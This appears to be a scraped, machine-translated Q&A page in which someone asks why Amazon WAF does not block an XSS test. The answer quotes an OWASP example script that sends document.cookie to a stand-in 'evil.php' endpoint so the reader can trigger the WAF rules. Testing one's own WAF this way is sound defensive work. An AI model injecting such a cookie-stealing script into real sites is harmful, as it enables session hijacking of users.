Intereting Posts
ZFS池安装不正确; 找不到所有文件
哈德森未能在tomcat5中启动
SVN结帐返回400错误
路由networking,子网客户端已断开tcp连接
站点无法到达 – 连接超时
计算机重新启动后无法启动MySQL 5.6服务器
ProCurve 2610 Java错误?
强制重新启动后,RHEL 6.2在启动屏幕上挂起
KVM虚拟化的CentOS可以发送/接收TCP而不是UDP
用CD光盘上的DBAN清除惠普盒上的硬盘驱动器?
Ubuntu 9.10:我如何解决一个看起来不会运行的启动脚本?
在explorer.exe中创build新文件夹时如何诊断挂起
使用iptables阻止Skype
Apache不显示PHP错误的自定义500错误页面
Autoindex切断目录path的结尾; 需要解决方法
Amazon WAF不阻止XSS或SQL注入
我试过用<script>danger</script>提交表单,而我没有被封锁。 我把WAF放在我的ELB上,并做了testing,以确保我有分析(下)。
我究竟做错了什么?
这是我的ACL:
- 在AWS中存储未经Web服务器访问的路由请求体
- EFS'sudo mount -t nfs4'挂起
- 适用于AvailabilityZone的AWS策略
- 亚马逊t2.mikrojenkinstesting
- 是否可以复制一个完整的实例并更改密钥对名称和实例types
这是我的XSS和SQL规则:
分析:(为了显示stream量确实通过LB路由) 
以下是如何触发XSS规则的一个例子。 这应该自己触发你的规则(你可以通过指向你自己的PHP页面或其他Web位置来certificate它),但是这至lesscertificate了一般原则。
<script type="text/javascript"> var adr = '../evil.php?cakemonster=' + escape(document.cookie); document.write("<img src='" + adr + "' />"); </script>
这个和其他的例子可以在下面的OWASP文章中find:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)